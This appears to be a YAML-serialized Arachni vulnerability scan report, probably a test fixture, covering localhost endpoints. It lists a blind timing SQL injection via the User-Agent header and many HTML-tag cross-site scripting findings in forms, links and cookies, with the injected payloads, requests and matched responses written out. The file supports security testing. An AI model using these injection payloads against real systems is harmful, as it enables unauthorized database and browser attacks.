    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: ;waitfor delay '0:0:__TIME__'--
      :skip_orig: true
      :injected_orig: ;waitfor delay '0:0:8'--
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;waitfor delay '0:0:8'--
      :injected: arachni_user;waitfor delay '0:0:8'--
      :combo: 
        User-Agent: arachni_user;waitfor delay '0:0:8'--
      :action: http://localhost:7499/mssql/header/append
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/mssql/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded in a HTML element.
        This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
  elem: form
  internal_modname: XSSHTMLTag
  method: GET
  mod_name: XSS in HTML tag
  name: Cross-Site Scripting in HTML tag.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - script
  - tag
  - regexp
  - dom
  - attribute
  - injection
  url: http://localhost:14528/form/double
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded in a HTML element.
          This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie1=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "122"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    internal_modname: XSSHTMLTag
    method: GET
    mod_name: XSS in HTML tag
    name: Cross-Site Scripting in HTML tag.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "\" arachni_xss_in_tag=\"71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1"
      :altered: input
      :element: form
      :no_auditor: true
      :params: 
        input: default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :combo: 
        input: default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:14528/form/double
      :match: <a href="/" class="default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: <a href="/" class="default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being returned as part of the HTML code of a page.
    response: <a href='/' class="default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
    severity: High
    tags: 
    - xss
    - script
    - tag
    - regexp
    - dom
    - attribute
    - injection
    url: http://localhost:14528/form/double
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded in a HTML element.
        This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
  elem: form
  internal_modname: XSSHTMLTag
  method: GET
  mod_name: XSS in HTML tag
  name: Cross-Site Scripting in HTML tag.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - script
  - tag
  - regexp
  - dom
  - attribute
  - injection
  url: http://localhost:14528/form/single
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded in a HTML element.
          This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie1=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "122"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: default' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    internal_modname: XSSHTMLTag
    method: GET
    mod_name: XSS in HTML tag
    name: Cross-Site Scripting in HTML tag.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1"
      :altered: input
      :element: form
      :no_auditor: true
      :params: 
        input: default' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: default' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :combo: 
        input: default' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:14528/form/single
      :match: <a href="/" class="default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: <a href="/" class="default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being returned as part of the HTML code of a page.
    response: <a href='/' class='default' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1'>Vuln</a>
    severity: High
    tags: 
    - xss
    - script
    - tag
    - regexp
    - dom
    - attribute
    - injection
    url: http://localhost:14528/form/single
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded in a HTML element.
        This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
  elem: form
  internal_modname: XSSHTMLTag
  method: GET
  mod_name: XSS in HTML tag
  name: Cross-Site Scripting in HTML tag.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - script
  - tag
  - regexp
  - dom
  - attribute
  - injection
  url: http://localhost:14528/form/no
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded in a HTML element.
          This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie1=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "118"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: default arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    internal_modname: XSSHTMLTag
    method: GET
    mod_name: XSS in HTML tag
    name: Cross-Site Scripting in HTML tag.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: " arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1"
      :altered: input
      :element: form
      :params: 
        input: default arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: default arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :combo: 
        input: default arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:14528/form/no
      :match: <a href="/" class="default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: <a href="/" class="default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being returned as part of the HTML code of a page.
    response: <a href='/' class=default arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1>Vuln</a>
    severity: High
    tags: 
    - xss
    - script
    - tag
    - regexp
    - dom
    - attribute
    - injection
    url: http://localhost:14528/form/no
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded in a HTML element.
        This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
  elem: link
  internal_modname: XSSHTMLTag
  method: GET
  mod_name: XSS in HTML tag
  name: Cross-Site Scripting in HTML tag.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - script
  - tag
  - regexp
  - dom
  - attribute
  - injection
  url: http://localhost:14528/link/no?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded in a HTML element.
          This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie1=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "118"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: default arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    internal_modname: XSSHTMLTag
    method: GET
    mod_name: XSS in HTML tag
    name: Cross-Site Scripting in HTML tag.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: " arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1"
      :altered: input
      :element: link
      :params: 
        input: default arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: default arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :combo: 
        input: default arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:14528/link/no?input=default
      :match: <a href="/" class="default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: <a href="/" class="default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being returned as part of the HTML code of a page.
    response: <a href='/' class=default arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1>Vuln</a>
    severity: High
    tags: 
    - xss
    - script
    - tag
    - regexp
    - dom
    - attribute
    - injection
    url: http://localhost:14528/link/no?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded in a HTML element.
        This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
  elem: link
  internal_modname: XSSHTMLTag
  method: GET
  mod_name: XSS in HTML tag
  name: Cross-Site Scripting in HTML tag.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - script
  - tag
  - regexp
  - dom
  - attribute
  - injection
  url: http://localhost:14528/link/double?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded in a HTML element.
          This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie1=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "122"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    internal_modname: XSSHTMLTag
    method: GET
    mod_name: XSS in HTML tag
    name: Cross-Site Scripting in HTML tag.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "\" arachni_xss_in_tag=\"71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1"
      :altered: input
      :element: link
      :params: 
        input: default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :combo: 
        input: default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:14528/link/double?input=default
      :match: <a href="/" class="default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: <a href="/" class="default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being returned as part of the HTML code of a page.
    response: <a href='/' class="default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
    severity: High
    tags: 
    - xss
    - script
    - tag
    - regexp
    - dom
    - attribute
    - injection
    url: http://localhost:14528/link/double?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded in a HTML element.
        This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
  elem: link
  internal_modname: XSSHTMLTag
  method: GET
  mod_name: XSS in HTML tag
  name: Cross-Site Scripting in HTML tag.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - script
  - tag
  - regexp
  - dom
  - attribute
  - injection
  url: http://localhost:14528/link/single?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded in a HTML element.
          This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie1=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "122"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: default' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    internal_modname: XSSHTMLTag
    method: GET
    mod_name: XSS in HTML tag
    name: Cross-Site Scripting in HTML tag.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1"
      :altered: input
      :element: link
      :params: 
        input: default' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: default' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :combo: 
        input: default' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:14528/link/single?input=default
      :match: <a href="/" class="default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: <a href="/" class="default" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being returned as part of the HTML code of a page.
    response: <a href='/' class='default' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1'>Vuln</a>
    severity: High
    tags: 
    - xss
    - script
    - tag
    - regexp
    - dom
    - attribute
    - injection
    url: http://localhost:14528/link/single?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded in a HTML element.
        This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
  elem: cookie
  internal_modname: XSSHTMLTag
  method: GET
  mod_name: XSS in HTML tag
  name: Cross-Site Scripting in HTML tag.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - script
  - tag
  - regexp
  - dom
  - attribute
  - injection
  url: http://localhost:14528/cookie/no
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded in a HTML element.
          This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value+arachni_xss_in_tag%3D71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1;cookie1=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "123"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: cookie value arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    internal_modname: XSSHTMLTag
    method: GET
    mod_name: XSS in HTML tag
    name: Cross-Site Scripting in HTML tag.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: " arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1"
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: cookie value arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: cookie value arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :combo: 
        cookie: cookie value arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:14528/cookie/no
      :match: <a href="/" class="cookie" value arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: <a href="/" class="cookie" value arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being returned as part of the HTML code of a page.
    response: <a href='/' class=cookie value arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1>Vuln</a>
    severity: High
    tags: 
    - xss
    - script
    - tag
    - regexp
    - dom
    - attribute
    - injection
    url: http://localhost:14528/cookie/no
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded in a HTML element.
        This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
  elem: cookie
  internal_modname: XSSHTMLTag
  method: GET
  mod_name: XSS in HTML tag
  name: Cross-Site Scripting in HTML tag.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - script
  - tag
  - regexp
  - dom
  - attribute
  - injection
  url: http://localhost:14528/cookie/single
  var: cookie1
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded in a HTML element.
          This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie1=cookie+value'+arachni_xss_in_tag%3D'71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "127"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: cookie value' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    internal_modname: XSSHTMLTag
    method: GET
    mod_name: XSS in HTML tag
    name: Cross-Site Scripting in HTML tag.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1"
      :altered: cookie1
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie1: cookie value' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: cookie value' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :combo: 
        cookie1: cookie value' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:14528/cookie/single
      :match: <a href="/" class="cookie value" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: <a href="/" class="cookie value" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being returned as part of the HTML code of a page.
    response: <a href='/' class='cookie value' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1'>Vuln</a>
    severity: High
    tags: 
    - xss
    - script
    - tag
    - regexp
    - dom
    - attribute
    - injection
    url: http://localhost:14528/cookie/single
    var: cookie1
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded in a HTML element.
        This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
  elem: cookie
  internal_modname: XSSHTMLTag
  method: GET
  mod_name: XSS in HTML tag
  name: Cross-Site Scripting in HTML tag.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - script
  - tag
  - regexp
  - dom
  - attribute
  - injection
  url: http://localhost:14528/cookie/double
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded in a HTML element.
          This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie1=cookie+value;cookie2=cookie+value"+arachni_xss_in_tag%3D"71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "127"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: cookie value" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    internal_modname: XSSHTMLTag
    method: GET
